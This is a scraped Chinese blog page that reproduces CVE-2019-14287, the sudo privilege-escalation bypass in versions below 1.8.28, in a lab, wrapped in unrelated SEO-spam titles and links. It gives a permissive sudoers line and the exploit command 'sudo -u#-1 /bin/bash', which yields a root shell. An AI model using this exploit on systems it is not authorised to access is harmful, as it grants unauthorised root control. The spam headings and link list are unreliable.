当前位置: 首页 > news >正文

做网站开发的电话销售话术/百度怎么做自己的网页

做网站开发的电话销售话术,百度怎么做自己的网页,廊坊专业网站建设,深圳官方网站制作漏洞描述#2019年10月14日,CVE官方发布了CVE-2019-14287的漏洞预警。通过特定payload,用户可提升至root权限。Sudo 的全称是“superuserdo”,它是Linux系统管理指令,允许用户在不需要切换环境的前提下以其它用户的权限运行应用程序…

bce285eb9b5c88352711173e29dd6b42.png

漏洞描述#

2019年10月14日,CVE官方发布了CVE-2019-14287的漏洞预警。通过特定payload,用户可提升至root权限。

Sudo 的全称是“superuserdo”,它是Linux系统管理指令,允许用户在不需要切换环境的前提下以其它用户的权限运行应用程序或命令,通常是以 root 用户身份运行命令,以减少 root 用户的登录和管理时间,同时提高安全性。

2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复,该漏洞编号为CVE-2019-14287。

利用前提

sudo -v < 1.8.28

知道当前用户的密码

当前用户存在于sudo权限列表

漏洞复现#

环境:

Linux parrot

Linux parrot 4.19.37-parrot1-amd64 #1 SMP Parrot 4.19.37-5parrot1 (2019-06-22) x86_64 GNU/Linux

前提,查看sudo版本,确定是否小于1.8.28

sudo -V

2ec1de815c342a9aa6feedf8bff76e3d.png

编辑/etc/sudoers文件,增加对shungg账户设置的权限

vi /etc/sudoers

shungg  ALL=(ALL,!root) /bin/bash

503c9bbf524a26b8dcfa64218b9711a2.png

wq! 保存退出.

shungg用户登录执行

sudo -u#-1 /bin/bash

ff40a137cfd6700a6498253199cda121.png

漏洞利用成功。

修复建议#

由 @shungg 改版而来

喜欢 (4)or分享 (0)

http://www.jmfq.cn/news/5193721.html

相关文章:

  • 网站清除数据库/网络营销服务的特点有哪些
  • 做暧暧视频免费视频网站/链接购买平台
  • 网站开发与/东莞网站制作推广公司
  • 中企动力做网站行吗/竞价推广代运营企业
  • 专业网站开发/亚马逊查关键词搜索量的工具
  • 武汉网站建设S小蝌蚪互联/seo整站优化多少钱
  • dreamweaver教程做网站/平台宣传推广方案
  • 企业网站怎么做排名/seo网站权重
  • 郑州网站建设公司排行/百度官方推广
  • 公司网站可以不备案吗/友链是什么
  • 网件路由器初始密码/搜索引擎优化的概念
  • 菏泽做网站公司/深圳网站seo优化公司
  • 网站手机站怎么做的/武汉新一轮疫情
  • 郑州锐旗网站公司/惠州seo排名优化
  • 做磁力链网站/cms
  • 延庆住房城乡建设委网站/杭州网站优化多少钱
  • 网站开发中的qq登录/长春网站关键词推广
  • seo怎么优化一个网站/seo公司推广
  • 做网站公司常熟/关键词难易度分析
  • 深圳电商网站建设/站长素材音效网
  • 网站建设基本流程是什么/2024年新冠疫情最新消息
  • 怎么在网站上做按钮/网络推广方法大全
  • wordpress安装主题之后首页不变/seo为什么要进行外部优化
  • 泰安大众网/关键词如何优化排名
  • 课程网站开发/网店代运营骗局
  • 适合做网站服务器的主机/做网站需要多少钱
  • 响应式网站建设服务提供商/大数据培训班需要多少钱
  • 互联网平面设计是干什么的/北京债务优化公司
  • wordpress 文章 新窗口打开/历下区百度seo
  • 电子上网站建设与维护/seo免费视频教程